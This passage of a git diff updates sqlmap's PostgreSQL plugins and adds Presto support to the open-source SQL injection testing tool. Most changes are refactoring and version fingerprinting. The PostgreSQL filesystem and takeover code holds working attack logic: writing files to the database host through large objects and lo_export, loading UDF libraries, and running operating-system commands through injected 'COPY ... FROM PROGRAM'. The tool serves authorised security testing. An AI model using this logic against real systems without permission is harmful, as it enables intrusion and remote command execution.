(http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ try: @@ -10,9 +10,10 @@ import psycopg2.extensions psycopg2.extensions.register_type(psycopg2.extensions.UNICODE) psycopg2.extensions.register_type(psycopg2.extensions.UNICODEARRAY) -except ImportError: +except: pass +from lib.core.common import getSafeExString from lib.core.data import logger from lib.core.exception import SqlmapConnectionException from plugins.generic.connector import Connector as GenericConnector @@ -28,27 +29,24 @@ class Connector(GenericConnector): Possible connectors: http://wiki.python.org/moin/PostgreSQL """ - def __init__(self): - GenericConnector.__init__(self) - def connect(self): self.initConnection() try: self.connector = psycopg2.connect(host=self.hostname, user=self.user, password=self.password, database=self.db, port=self.port) - except psycopg2.OperationalError, msg: - raise SqlmapConnectionException(msg) + except (psycopg2.OperationalError, UnicodeDecodeError) as ex: + raise SqlmapConnectionException(getSafeExString(ex)) self.connector.set_client_encoding('UNICODE') self.initCursor() - self.connected() + self.printConnected() def fetchall(self): try: return self.cursor.fetchall() - except psycopg2.ProgrammingError, msg: - 
logger.warn(msg) + except psycopg2.ProgrammingError as ex: + logger.warning(getSafeExString(ex)) return None def execute(self, query): @@ -57,10 +55,10 @@ def execute(self, query): try: self.cursor.execute(query) retVal = True - except (psycopg2.OperationalError, psycopg2.ProgrammingError), msg: - logger.warn(("(remote) %s" % msg).strip()) - except psycopg2.InternalError, msg: - raise SqlmapConnectionException(msg) + except (psycopg2.OperationalError, psycopg2.ProgrammingError) as ex: + logger.warning(("(remote) '%s'" % getSafeExString(ex)).strip()) + except psycopg2.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) self.connector.commit() diff --git a/plugins/dbms/postgresql/enumeration.py b/plugins/dbms/postgresql/enumeration.py index 5db5886e11d..181384becbc 100644 --- a/plugins/dbms/postgresql/enumeration.py +++ b/plugins/dbms/postgresql/enumeration.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.data import logger @@ -10,9 +10,6 @@ from plugins.generic.enumeration import Enumeration as GenericEnumeration class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - def getHostname(self): warnMsg = "on PostgreSQL it is not possible to enumerate the hostname" - logger.warn(warnMsg) + logger.warning(warnMsg) diff --git a/plugins/dbms/postgresql/filesystem.py b/plugins/dbms/postgresql/filesystem.py index 6c3e8e38577..d0298f2b627 100644 --- a/plugins/dbms/postgresql/filesystem.py +++ b/plugins/dbms/postgresql/filesystem.py @@ -1,68 +1,51 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os from lib.core.common import randomInt +from lib.core.compat import xrange from lib.core.data import kb from lib.core.data import logger from lib.core.exception import SqlmapUnsupportedFeatureException +from lib.core.settings import LOBLKSIZE from lib.request import inject from plugins.generic.filesystem import Filesystem as GenericFilesystem class Filesystem(GenericFilesystem): def __init__(self): self.oid = None + self.page = None GenericFilesystem.__init__(self) - def stackedReadFile(self, rFile): - infoMsg = "fetching file: '%s'" % rFile - logger.info(infoMsg) + def stackedReadFile(self, remoteFile): + if not kb.bruteMode: + infoMsg = "fetching file: '%s'" % remoteFile + logger.info(infoMsg) self.initEnv() - return self.udfEvalCmd(cmd=rFile, udfName="sys_fileread") + return self.udfEvalCmd(cmd=remoteFile, udfName="sys_fileread") - def unionWriteFile(self, wFile, dFile, fileType): + def unionWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False): errMsg = "PostgreSQL does not support file upload with UNION " errMsg += "query SQL injection technique" raise SqlmapUnsupportedFeatureException(errMsg) - def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): - wFileSize = os.path.getsize(wFile) - - if wFileSize > 8192: - errMsg = "on PostgreSQL it is not possible to write files " - errMsg += "bigger than 8192 bytes at the moment" - raise SqlmapUnsupportedFeatureException(errMsg) + def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): + 
localFileSize = os.path.getsize(localFile) + content = open(localFile, "rb").read() self.oid = randomInt() - - debugMsg = "creating a support table to write the base64 " - debugMsg += "encoded file to" - logger.debug(debugMsg) + self.page = 0 self.createSupportTbl(self.fileTblName, self.tblField, "text") - logger.debug("encoding file to its base64 string value") - fcEncodedList = self.fileEncode(wFile, "base64", False) - - debugMsg = "forging SQL statements to write the base64 " - debugMsg += "encoded file to the support table" - logger.debug(debugMsg) - - sqlQueries = self.fileToSqlQueries(fcEncodedList) - - logger.debug("inserting the base64 encoded file to the support table") - - for sqlQuery in sqlQueries: - inject.goStacked(sqlQuery) - debugMsg = "create a new OID for a large object, it implicitly " debugMsg += "adds an entry in the large objects system table" logger.debug(debugMsg) @@ -70,47 +53,30 @@ def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): # References: # http://www.postgresql.org/docs/8.3/interactive/largeobjects.html # http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html + inject.goStacked("SELECT lo_unlink(%d)" % self.oid) inject.goStacked("SELECT lo_create(%d)" % self.oid) + inject.goStacked("DELETE FROM pg_largeobject WHERE loid=%d" % self.oid) - debugMsg = "updating the system large objects table assigning to " - debugMsg += "the just created OID the binary (base64 decoded) UDF " - debugMsg += "as data" - logger.debug(debugMsg) + for offset in xrange(0, localFileSize, LOBLKSIZE): + fcEncodedList = self.fileContentEncode(content[offset:offset + LOBLKSIZE], "base64", False) + sqlQueries = self.fileToSqlQueries(fcEncodedList) + + for sqlQuery in sqlQueries: + inject.goStacked(sqlQuery) + + inject.goStacked("INSERT INTO pg_largeobject VALUES (%d, %d, DECODE((SELECT %s FROM %s), 'base64'))" % (self.oid, self.page, self.tblField, self.fileTblName)) + inject.goStacked("DELETE FROM %s" % self.fileTblName) - # Refereces: - # * http://www.postgresql.org/docs/8.3/interactive/catalog-pg-largeobject.html - # * http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql - # - # NOTE: From PostgreSQL site: - # - # "The data stored in the large object will never be more than - # LOBLKSIZE bytes and might be less which is BLCKSZ/4, or - # typically 2 Kb" - # - # As a matter of facts it was possible to store correctly a file - # large 13776 bytes, the problem arises at next step (lo_export()) - # - # Inject manually into PostgreSQL system table pg_largeobject the - # base64-decoded file content. Note that PostgreSQL >= 9.0 does - # not accept UPDATE into that table for some reason. 
- self.getVersionFromBanner() - banVer = kb.bannerFp["dbmsVersion"] - - if banVer >= "9.0": - inject.goStacked("INSERT INTO pg_largeobject VALUES (%d, 0, DECODE((SELECT %s FROM %s), 'base64'))" % (self.oid, self.tblField, self.fileTblName)) - else: - inject.goStacked("UPDATE pg_largeobject SET data=(DECODE((SELECT %s FROM %s), 'base64')) WHERE loid=%d" % (self.tblField, self.fileTblName, self.oid)) + self.page += 1 debugMsg = "exporting the OID %s file content to " % fileType - debugMsg += "file '%s'" % dFile + debugMsg += "file '%s'" % remoteFile logger.debug(debugMsg) - # NOTE: lo_export() exports up to only 8192 bytes of the file - # (pg_largeobject 'data' field) - inject.goStacked("SELECT lo_export(%d, '%s')" % (self.oid, dFile), silent=True) + inject.goStacked("SELECT lo_export(%d, '%s')" % (self.oid, remoteFile), silent=True) - written = self.askCheckWrittenFile(wFile, dFile, forceCheck) + written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck) inject.goStacked("SELECT lo_unlink(%d)" % self.oid) diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py index d92dfcfbd4e..20eed02a917 100644 --- a/plugins/dbms/postgresql/fingerprint.py +++ b/plugins/dbms/postgresql/fingerprint.py @@ -1,22 +1,23 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.common import Backend from lib.core.common import Format -from lib.core.common import getUnicode -from lib.core.common import randomInt +from lib.core.common import hashDBRetrieve +from lib.core.common import hashDBWrite from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.enums import DBMS +from lib.core.enums import FORK +from lib.core.enums import HASHDB_KEYS from lib.core.enums import OS from lib.core.session import setDbms from lib.core.settings import PGSQL_ALIASES -from lib.core.settings import PGSQL_SYSTEM_DBS from lib.request import inject from plugins.generic.fingerprint import Fingerprint as GenericFingerprint @@ -25,6 +26,30 @@ def __init__(self): GenericFingerprint.__init__(self, DBMS.PGSQL) def getFingerprint(self): + fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK) + + if fork is None: + if inject.checkBooleanExpression("VERSION() LIKE '%CockroachDB%'"): + fork = FORK.COCKROACHDB + elif inject.checkBooleanExpression("VERSION() LIKE '%Redshift%'"): # Reference: https://dataedo.com/kb/query/amazon-redshift/check-server-version + fork = FORK.REDSHIFT + elif inject.checkBooleanExpression("VERSION() LIKE '%Greenplum%'"): # Reference: http://www.sqldbpros.com/wordpress/wp-content/uploads/2014/08/what-version-of-greenplum.png + fork = FORK.GREENPLUM + elif inject.checkBooleanExpression("VERSION() LIKE '%Yellowbrick%'"): # Reference: https://www.yellowbrick.com/docs/3.3/ybd_sqlref/version.html + fork = FORK.YELLOWBRICK + elif inject.checkBooleanExpression("VERSION() LIKE '%EnterpriseDB%'"): # Reference: https://www.enterprisedb.com/edb-docs/d/edb-postgres-advanced-server/user-guides/user-guide/11/EDB_Postgres_Advanced_Server_Guide.1.087.html + fork = FORK.ENTERPRISEDB + elif inject.checkBooleanExpression("VERSION() LIKE '%YB-%'"): # Reference: https://github.com/yugabyte/yugabyte-db/issues/2447#issue-499562926 + fork = FORK.YUGABYTEDB + elif inject.checkBooleanExpression("VERSION() LIKE '%openGauss%'"): + fork = 
FORK.OPENGAUSS + elif inject.checkBooleanExpression("AURORA_VERSION() LIKE '%'"): # Reference: https://aws.amazon.com/premiumsupport/knowledge-center/aurora-version-number/ + fork = FORK.AURORA + else: + fork = "" + + hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork) + value = "" wsOsFp = Format.getOs("web server", kb.headersFp) @@ -41,6 +66,8 @@ def getFingerprint(self): if not conf.extensiveFp: value += DBMS.PGSQL + if fork: + value += " (%s fork)" % fork return value actVer = Format.getDbms() @@ -48,25 +75,30 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) htmlErrorFp = Format.getErrorParsedDBMSes() if htmlErrorFp: value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + if fork: + value += "\n%sfork fingerprint: %s" % (blank, fork) + return value def checkDbms(self): """ References for fingerprint: - * http://www.postgresql.org/docs/9.1/interactive/release.html (up to 9.1.3) + * https://www.postgresql.org/docs/current/static/release.html """ - if not conf.extensiveFp and (Backend.isDbmsWithin(PGSQL_ALIASES) or conf.dbms in PGSQL_ALIASES): + if not conf.extensiveFp and Backend.isDbmsWithin(PGSQL_ALIASES): setDbms(DBMS.PGSQL) self.getBanner() @@ -76,18 +108,18 @@ def checkDbms(self): infoMsg = "testing %s" % DBMS.PGSQL logger.info(infoMsg) - randInt = getUnicode(randomInt(1)) - result = inject.checkBooleanExpression("%s::int=%s" % (randInt, randInt)) + # NOTE: Vertica works too without the CONVERT_TO() + result = inject.checkBooleanExpression("CONVERT_TO('[RANDSTR]', QUOTE_IDENT(NULL)) IS NULL") if result: infoMsg = "confirming %s" % DBMS.PGSQL logger.info(infoMsg) - result = inject.checkBooleanExpression("COALESCE(%s, NULL)=%s" % (randInt, randInt)) + result = inject.checkBooleanExpression("COALESCE([RANDNUM], NULL)=[RANDNUM]") if not result: warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL - logger.warn(warnMsg) + logger.warning(warnMsg) return False @@ -101,37 +133,63 @@ def checkDbms(self): infoMsg = "actively fingerprinting %s" % DBMS.PGSQL logger.info(infoMsg) - if inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"): - Backend.setVersion(">= 9.1.0") - elif inject.checkBooleanExpression("LENGTH(TO_CHAR(1, 'EEEE'))>0"): + if inject.checkBooleanExpression("JSON_QUERY(NULL::jsonb, '$') IS NULL"): + Backend.setVersion(">= 17.0") + elif inject.checkBooleanExpression("RANDOM_NORMAL(0.0, 1.0) IS NOT NULL"): + Backend.setVersion(">= 16.0") + elif inject.checkBooleanExpression("REGEXP_COUNT(NULL,NULL) IS NULL"): + Backend.setVersion(">= 15.0") + elif inject.checkBooleanExpression("BIT_COUNT(NULL) IS NULL"): + Backend.setVersion(">= 14.0") + elif inject.checkBooleanExpression("NULL::anycompatible IS NULL"): + Backend.setVersion(">= 13.0") + elif inject.checkBooleanExpression("SINH(0)=0"): + Backend.setVersion(">= 12.0") + elif inject.checkBooleanExpression("SHA256(NULL) IS NULL"): + Backend.setVersion(">= 11.0") + elif inject.checkBooleanExpression("XMLTABLE(NULL) IS NULL"): + Backend.setVersionList([">= 10.0", "< 11.0"]) + elif inject.checkBooleanExpression("SIND(0)=0"): + Backend.setVersionList([">= 9.6.0", "< 10.0"]) + elif inject.checkBooleanExpression("TO_JSONB(1) IS NOT NULL"): + 
Backend.setVersionList([">= 9.5.0", "< 9.6.0"]) + elif inject.checkBooleanExpression("JSON_TYPEOF(NULL) IS NULL"): + Backend.setVersionList([">= 9.4.0", "< 9.5.0"]) + elif inject.checkBooleanExpression("ARRAY_REPLACE(NULL,1,1) IS NULL"): + Backend.setVersionList([">= 9.3.0", "< 9.4.0"]) + elif inject.checkBooleanExpression("ROW_TO_JSON(NULL) IS NULL"): + Backend.setVersionList([">= 9.2.0", "< 9.3.0"]) + elif inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"): + Backend.setVersionList([">= 9.1.0", "< 9.2.0"]) + elif inject.checkBooleanExpression("LENGTH(TO_CHAR(1,'EEEE'))>0"): Backend.setVersionList([">= 9.0.0", "< 9.1.0"]) - elif inject.checkBooleanExpression("2=(SELECT DIV(6, 3))"): + elif inject.checkBooleanExpression("2=(SELECT DIV(6,3))"): Backend.setVersionList([">= 8.4.0", "< 9.0.0"]) elif inject.checkBooleanExpression("EXTRACT(ISODOW FROM CURRENT_TIMESTAMP)<8"): Backend.setVersionList([">= 8.3.0", "< 8.4.0"]) elif inject.checkBooleanExpression("ISFINITE(TRANSACTION_TIMESTAMP())"): Backend.setVersionList([">= 8.2.0", "< 8.3.0"]) - elif inject.checkBooleanExpression("9=(SELECT GREATEST(5, 9, 1))"): + elif inject.checkBooleanExpression("9=(SELECT GREATEST(5,9,1))"): Backend.setVersionList([">= 8.1.0", "< 8.2.0"]) - elif inject.checkBooleanExpression("3=(SELECT WIDTH_BUCKET(5.35, 0.024, 10.06, 5))"): + elif inject.checkBooleanExpression("3=(SELECT WIDTH_BUCKET(5.35,0.024,10.06,5))"): Backend.setVersionList([">= 8.0.0", "< 8.1.0"]) - elif inject.checkBooleanExpression("'d'=(SELECT SUBSTR(MD5('sqlmap'), 1, 1))"): + elif inject.checkBooleanExpression("'d'=(SELECT SUBSTR(MD5('sqlmap'),1,1))"): Backend.setVersionList([">= 7.4.0", "< 8.0.0"]) - elif inject.checkBooleanExpression("'p'=(SELECT SUBSTR(CURRENT_SCHEMA(), 1, 1))"): + elif inject.checkBooleanExpression("'p'=(SELECT SUBSTR(CURRENT_SCHEMA(),1,1))"): Backend.setVersionList([">= 7.3.0", "< 7.4.0"]) elif inject.checkBooleanExpression("8=(SELECT BIT_LENGTH(1))"): Backend.setVersionList([">= 7.2.0", "< 7.3.0"]) - elif inject.checkBooleanExpression("'a'=(SELECT SUBSTR(QUOTE_LITERAL('a'), 2, 1))"): + elif inject.checkBooleanExpression("'a'=(SELECT SUBSTR(QUOTE_LITERAL('a'),2,1))"): Backend.setVersionList([">= 7.1.0", "< 7.2.0"]) - elif inject.checkBooleanExpression("8=(SELECT POW(2, 3))"): + elif inject.checkBooleanExpression("8=(SELECT POW(2,3))"): Backend.setVersionList([">= 7.0.0", "< 7.1.0"]) elif inject.checkBooleanExpression("'a'=(SELECT MAX('a'))"): Backend.setVersionList([">= 6.5.0", "< 6.5.3"]) elif inject.checkBooleanExpression("VERSION()=VERSION()"): Backend.setVersionList([">= 6.4.0", "< 6.5.0"]) - elif inject.checkBooleanExpression("2=(SELECT SUBSTR(CURRENT_DATE, 1, 1))"): + elif inject.checkBooleanExpression("2=(SELECT SUBSTR(CURRENT_DATE,1,1))"): Backend.setVersionList([">= 6.3.0", "< 6.4.0"]) - elif inject.checkBooleanExpression("'s'=(SELECT SUBSTRING('sqlmap', 1, 1))"): + elif inject.checkBooleanExpression("'s'=(SELECT SUBSTRING('sqlmap',1,1))"): Backend.setVersionList([">= 6.2.0", "< 6.3.0"]) else: Backend.setVersion("< 6.2.0") @@ -139,7 +197,7 @@ def checkDbms(self): return True else: warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL - logger.warn(warnMsg) + logger.warning(warnMsg) return False @@ -173,13 +231,3 @@ def checkDbmsOs(self, detailed=False): logger.info(infoMsg) self.cleanup(onlyFileTbl=True) - - def forceDbmsEnum(self): - if conf.db not in PGSQL_SYSTEM_DBS and conf.db != "public": - conf.db = "public" - - warnMsg = "on %s it is possible to enumerate " % DBMS.PGSQL - warnMsg += "only on the current 
schema and/or system databases. " - warnMsg += "sqlmap is going to use 'public' schema as a " - warnMsg += "database name" - logger.warn(warnMsg) diff --git a/plugins/dbms/postgresql/syntax.py b/plugins/dbms/postgresql/syntax.py index 6b887a7730c..f730a800107 100644 --- a/plugins/dbms/postgresql/syntax.py +++ b/plugins/dbms/postgresql/syntax.py @@ -1,24 +1,25 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.convert import getOrds from plugins.generic.syntax import Syntax as GenericSyntax class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - @staticmethod def escape(expression, quote=True): """ Note: PostgreSQL has a general problem with concenation operator (||) precedence (hence the parentheses enclosing) e.g. SELECT 1 WHERE 'a'!='a'||'b' will trigger error ("argument of WHERE must be type boolean, not type text") + + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT (CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104)) FROM foobar" + True """ def escaper(value): - return "(%s)" % "||".join("CHR(%d)" % ord(_) for _ in value) # Postgres CHR() function already accepts Unicode code point of character(s) + return "(%s)" % "||".join("CHR(%d)" % _ for _ in getOrds(value)) # Postgres CHR() function already accepts Unicode code point of character(s) return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/postgresql/takeover.py b/plugins/dbms/postgresql/takeover.py index 5c3c10cca9d..ea187fc79b0 100644 --- a/plugins/dbms/postgresql/takeover.py +++ b/plugins/dbms/postgresql/takeover.py @@ -1,24 +1,32 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import os + from lib.core.common import Backend +from lib.core.common import checkFile +from lib.core.common import decloakToTemp +from lib.core.common import flattenValue +from lib.core.common import filterNone +from lib.core.common import isListLike +from lib.core.common import isNoneValue +from lib.core.common import isStackingAvailable from lib.core.common import randomStr +from lib.core.compat import LooseVersion from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths from lib.core.enums import OS +from lib.core.exception import SqlmapSystemException from lib.core.exception import SqlmapUnsupportedFeatureException from lib.request import inject from plugins.generic.takeover import Takeover as GenericTakeover class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - def udfSetRemotePath(self): # On Windows if Backend.isOs(OS.WINDOWS): @@ -43,24 +51,31 @@ def udfSetLocalPaths(self): banVer = kb.bannerFp["dbmsVersion"] - if banVer >= "9.0": - majorVer = "9.0" - elif banVer >= "8.4": - majorVer = "8.4" - elif banVer >= "8.3": - majorVer = "8.3" - elif banVer >= "8.2": - majorVer = "8.2" + if not banVer or not banVer[0].isdigit(): + errMsg = "unsupported feature on unknown version of PostgreSQL" + raise SqlmapUnsupportedFeatureException(errMsg) + elif LooseVersion(banVer) >= LooseVersion("10"): + majorVer = banVer.split('.')[0] + elif LooseVersion(banVer) >= 
LooseVersion("8.2") and '.' in banVer: + majorVer = '.'.join(banVer.split('.')[:2]) else: errMsg = "unsupported feature on versions of PostgreSQL before 8.2" raise SqlmapUnsupportedFeatureException(errMsg) - if Backend.isOs(OS.WINDOWS): - self.udfLocalFile += "/postgresql/windows/%d/%s/lib_postgresqludf_sys.dll" % (Backend.getArch(), majorVer) - self.udfSharedLibExt = "dll" - else: - self.udfLocalFile += "/postgresql/linux/%d/%s/lib_postgresqludf_sys.so" % (Backend.getArch(), majorVer) - self.udfSharedLibExt = "so" + try: + if Backend.isOs(OS.WINDOWS): + _ = os.path.join(self.udfLocalFile, "postgresql", "windows", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.dll_") + checkFile(_) + self.udfLocalFile = decloakToTemp(_) + self.udfSharedLibExt = "dll" + else: + _ = os.path.join(self.udfLocalFile, "postgresql", "linux", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.so_") + checkFile(_) + self.udfLocalFile = decloakToTemp(_) + self.udfSharedLibExt = "so" + except SqlmapSystemException: + errMsg = "unsupported feature on PostgreSQL %s (%s-bit)" % (majorVer, Backend.getArch()) + raise SqlmapUnsupportedFeatureException(errMsg) def udfCreateFromSharedLib(self, udf, inpRet): if udf in self.udfToCreate: @@ -81,3 +96,34 @@ def uncPathRequest(self): self.createSupportTbl(self.fileTblName, self.tblField, "text") inject.goStacked("COPY %s(%s) FROM '%s'" % (self.fileTblName, self.tblField, self.uncPath), silent=True) self.cleanup(onlyFileTbl=True) + + def copyExecCmd(self, cmd): + output = None + + if isStackingAvailable(): + # Reference: https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5 + self._forgedCmd = "DROP TABLE IF EXISTS %s;" % self.cmdTblName + self._forgedCmd += "CREATE TABLE %s(%s text);" % (self.cmdTblName, self.tblField) + self._forgedCmd += "COPY %s FROM PROGRAM '%s';" % (self.cmdTblName, cmd.replace("'", "''")) + inject.goStacked(self._forgedCmd) + + query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName) + output = inject.getValue(query, resumeValue=False) + + if isListLike(output): + output = flattenValue(output) + output = filterNone(output) + + if not isNoneValue(output): + output = os.linesep.join(output) + + self._cleanupCmd = "DROP TABLE %s" % self.cmdTblName + inject.goStacked(self._cleanupCmd) + + return output + + def checkCopyExec(self): + if kb.copyExecTest is None: + kb.copyExecTest = self.copyExecCmd("echo 1") == '1' + + return kb.copyExecTest diff --git a/plugins/dbms/presto/__init__.py b/plugins/dbms/presto/__init__.py new file mode 100644 index 00000000000..4fe48fc89ac --- /dev/null +++ b/plugins/dbms/presto/__init__.py @@ -0,0 +1,30 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import PRESTO_SYSTEM_DBS +from lib.core.unescaper import unescaper + +from plugins.dbms.presto.enumeration import Enumeration +from plugins.dbms.presto.filesystem import Filesystem +from plugins.dbms.presto.fingerprint import Fingerprint +from plugins.dbms.presto.syntax import Syntax +from plugins.dbms.presto.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class PrestoMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines Presto methods + """ + + def __init__(self): + self.excludeDbsList = PRESTO_SYSTEM_DBS + + for cls in self.__class__.__bases__: + 
cls.__init__(self) + + unescaper[DBMS.PRESTO] = Syntax.escape diff --git a/plugins/dbms/presto/connector.py b/plugins/dbms/presto/connector.py new file mode 100644 index 00000000000..f190c7ce2ea --- /dev/null +++ b/plugins/dbms/presto/connector.py @@ -0,0 +1,70 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +try: + import prestodb +except: + pass + +import logging +import struct + +from lib.core.common import getSafeExString +from lib.core.data import conf +from lib.core.data import logger +from lib.core.exception import SqlmapConnectionException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + """ + Homepage: https://github.com/prestodb/presto-python-client + User guide: https://github.com/prestodb/presto-python-client/blob/master/README.md + API: https://www.python.org/dev/peps/pep-0249/ + PyPI package: presto-python-client + License: Apache License 2.0 + """ + + def connect(self): + self.initConnection() + + try: + self.connector = prestodb.dbapi.connect(host=self.hostname, user=self.user, catalog=self.db, port=self.port, request_timeout=conf.timeout) + except (prestodb.exceptions.OperationalError, prestodb.exceptions.InternalError, prestodb.exceptions.ProgrammingError, struct.error) as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.initCursor() + self.printConnected() + + def fetchall(self): + try: + return self.cursor.fetchall() + except prestodb.exceptions.ProgrammingError as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + return None + + def execute(self, query): + retVal = False + + try: + self.cursor.execute(query) + retVal = True + except (prestodb.exceptions.OperationalError, prestodb.exceptions.ProgrammingError) as ex: + logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % getSafeExString(ex)) + except prestodb.exceptions.InternalError as ex: + raise SqlmapConnectionException(getSafeExString(ex)) + + self.connector.commit() + + return retVal + + def select(self, query): + retVal = None + + if self.execute(query): + retVal = self.fetchall() + + return retVal diff --git a/plugins/dbms/presto/enumeration.py b/plugins/dbms/presto/enumeration.py new file mode 100644 index 00000000000..aad5d4bcad5 --- /dev/null +++ b/plugins/dbms/presto/enumeration.py @@ -0,0 +1,58 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getBanner(self): + warnMsg = "on Presto it is not possible to get the banner" + logger.warning(warnMsg) + + return None + + def getCurrentDb(self): + warnMsg = "on Presto it is not possible to get name of the current database (schema)" + logger.warning(warnMsg) + + def isDba(self, user=None): + warnMsg = "on Presto it is not possible to test if current user is DBA" + logger.warning(warnMsg) + + def getUsers(self): + warnMsg = "on Presto it is not possible to enumerate the users" + logger.warning(warnMsg) + + return [] + + def getPasswordHashes(self): + warnMsg = "on Presto it is not possible to enumerate the user password hashes" + logger.warning(warnMsg) + + return {} + + def getPrivileges(self, *args, **kwargs): + warnMsg = "on Presto it is not 
possible to enumerate the user privileges" + logger.warning(warnMsg) + + return {} + + def getRoles(self, *args, **kwargs): + warnMsg = "on Presto it is not possible to enumerate the user roles" + logger.warning(warnMsg) + + return {} + + def getHostname(self): + warnMsg = "on Presto it is not possible to enumerate the hostname" + logger.warning(warnMsg) + + def getStatements(self): + warnMsg = "on Presto it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/presto/filesystem.py b/plugins/dbms/presto/filesystem.py new file mode 100644 index 00000000000..33793a67f47 --- /dev/null +++ b/plugins/dbms/presto/filesystem.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + def readFile(self, remoteFile): + errMsg = "on Presto it is not possible to read files" + raise SqlmapUnsupportedFeatureException(errMsg) + + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): + errMsg = "on Presto it is not possible to write files" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/presto/fingerprint.py b/plugins/dbms/presto/fingerprint.py new file mode 100644 index 00000000000..fdc5b7968a6 --- /dev/null +++ b/plugins/dbms/presto/fingerprint.py @@ -0,0 +1,137 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import PRESTO_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.PRESTO) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value 